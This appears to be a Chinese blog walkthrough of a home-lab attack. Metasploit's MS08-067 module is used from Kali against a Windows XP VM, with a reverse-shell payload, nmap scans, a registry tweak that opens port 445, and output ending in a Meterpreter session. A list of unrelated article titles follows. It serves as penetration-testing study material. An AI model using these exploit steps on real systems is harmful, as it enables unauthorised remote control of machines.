Kali:192.168.163.144
XP:192.168.163.136

XP关闭防火墙,测试两机器是否ping通。

msf > search ms08_067
[!] Module database cache not built yet, using slow searchMatching Modules
================Name                                 Disclosure Date  Rank   Description----                                 ---------------  ----   -----------exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

————————————————

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

————————————————

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp

————————————————


msf exploit(ms08_067_netapi) > set LHOST 192.168.163.144
LHOST => 192.168.163.144
msf exploit(ms08_067_netapi) > set RHOST 192.168.163.136
RHOST => 192.168.163.136

————————————————

msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.163.144:4444
[*] 192.168.163.136:445 - Automatically detecting the target...
[*] 192.168.163.136:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
[*] 192.168.163.136:445 - Selected Target: Windows XP SP3 Chinese - Traditional (NX)
[*] 192.168.163.136:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

————————————————

root@localhost:~# nmap -PS 192.168.163.136
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-28 21:53 EST
Nmap scan report for 192.168.163.136
Host is up (0.0017s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
MAC Address: 00:0C:29:BA:06:17 (VMware)Nmap done: 1 IP address (1 host up) scanned in 2.12 seconds

————————————————

445端口的打开方法:开始-运行输入regedit.修改注册表,添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 1 重新启动运行--CMD--输入netstat -an 可以看到开放的端口

————————————————

root@localhost:~# nmap -PS 192.168.163.136 445Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-28 22:02 EST
setup_target: failed to determine route to 445 (0.0.1.189)
Nmap scan report for 192.168.163.136
Host is up (0.00062s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BA:06:17 (VMware)

————————————————

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.163.136
[*] Meterpreter session 1 opened (192.168.163.144:41614 -> 192.168.163.136:4444) at 2019-11-29 17:29:32meterpreter >

matasploit框架漏洞利用相关推荐

  1. 漏洞升级?黑客可利用 Spring 框架漏洞部署 Mirai 恶意软件

    整理 | 苏宓 出品 | CSDN(ID:CSDNnews) 还记得不久之前 Java 圈中惊爆的 Spring 框架漏洞吗?得益很多人使用了 JDK 9 以下的版本.Spring 框架的最新版本,截 ...

  2. python工控开发框架_GitHub - hzglitter/isf: ISF(Industrial Security Framework),基于Python的工控漏洞利用框架...

    一.框架介绍 本框架主要使用Python语言开发,通过集成ShadowBroker释放的NSA工具Fuzzbunch攻击框架,开发一款适合工控漏洞利用的框架.由于Fuzzbunch攻击框架仅适用于Py ...

  3. 7. Vulnerability exploitation tools (漏洞利用工具 11个)

    Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

  4. metasploit 快速入门(三) 服务端漏洞利用

    目录 简介 01 攻击Linux服务器 02 SQL 注入 03 shell类型 04 攻击Windows 服务器 05 利用公用服务 06 MS17-010 永恒之蓝 SMB远程代码执行Window ...

  5. WiFiDemon – iOS WiFi RCE 0-Day漏洞利用

    近日,ZecOps安全研究人员发现了iOS WiFi命名漏洞的零交互攻击利用方式,可以用来远程劫持iPhone设备. Wi-Fi-Demon Wifid 是处理与WiFi连接相关的协议的系统daemo ...

  6. Kali Linux渗透基础知识整理(三):漏洞利用

    漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ...

  7. [译] APT分析报告:08.漏洞利用图谱–通过查找作者的指纹来寻找漏洞

    这是作者新开的一个专栏,主要翻译国外知名安全厂商的APT报告,了解它们的安全技术,学习它们溯源APT组织和恶意代码分析的方法,希望对您有所帮助.当然,由于作者英语有限,会借助机翻进行校验,还请包涵!前 ...

  8. jexboss工具 -- JBOSS未授权访问漏洞利用

    其实所有的节日,都不是为了礼物和红包而生,而是提醒我们不要忘记爱与被爱,生活需要仪式感,而你需要的是在乎和关爱... ----  网易云热评 小受:Ubuntu20 小攻:Kali2020 一.搭建该 ...

  9. ThinkPHP V5 漏洞利用

    ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有 ...

最新文章

  1. mysql sql查询json数据_mysql如何查询json的值
  2. mysql突然要注册_mysql跳过登陆注册,找回root密码 (window平台)
  3. xmlHttpRequest避免缓存的办法
  4. excel两个下拉框相互关联
  5. java两个日期之间的日期_获取两个日期之间的日期形成一个集合
  6. 怎样进行FineReader局域网中的分组工作
  7. 图像连通域标记算法研究
  8. mysql适合什么阵列_如何选择最合适的RAID级别
  9. mysql replication 互为主从的安装及配置,以及数据同步
  10. Linux系统中运行jar包的四种方式
  11. 主题:web.config中AppSettings和ConnectionStrings的区别
  12. MySql中varchar(10)和varchar(100)的区别==以及char的利弊
  13. java调用加密机实例_Enigma Java模拟实现恩尼格玛密码机加密解密过程 Develop 238万源代码下载- www.pudn.com...
  14. uniapp的语音功能
  15. [魔方]魔教秘籍4:《封王-易筋经》(概要)
  16. 【MATLAB小游戏】养鱼
  17. 文件格式FAT、FAT32、exFAT之间关系和区别
  18. border渐变 ios_IOS画渐变的三种方式
  19. 干货分享--企业微信社群促活的12种方式
  20. 两个月的面试真实经历,告诉大家如何能够进入大厂工作?

热门文章

  1. org module之org-eww
  2. 为了记忆的忘却(2007-06-12 13:19:05)
  3. C语言-求阶乘和的两种方法
  4. [笔记]学习HighCharts的使用(不错的web图表插件)
  5. 计算机考研复试范围,硕士研究生复试科目考试范围-计算机学院
  6. These critical programs are missing or too old: gawk bison
  7. Echarst柱状图+饼状图+vue2 商品案例
  8. 免费将中文视频转换为英文视频并添加中英双语字幕
  9. 计算机应用基础考试质量分析,考试成绩分析报告范文.docx
  10. python运行电脑要求_别这样直接运行python命令,否则电脑等于“裸奔”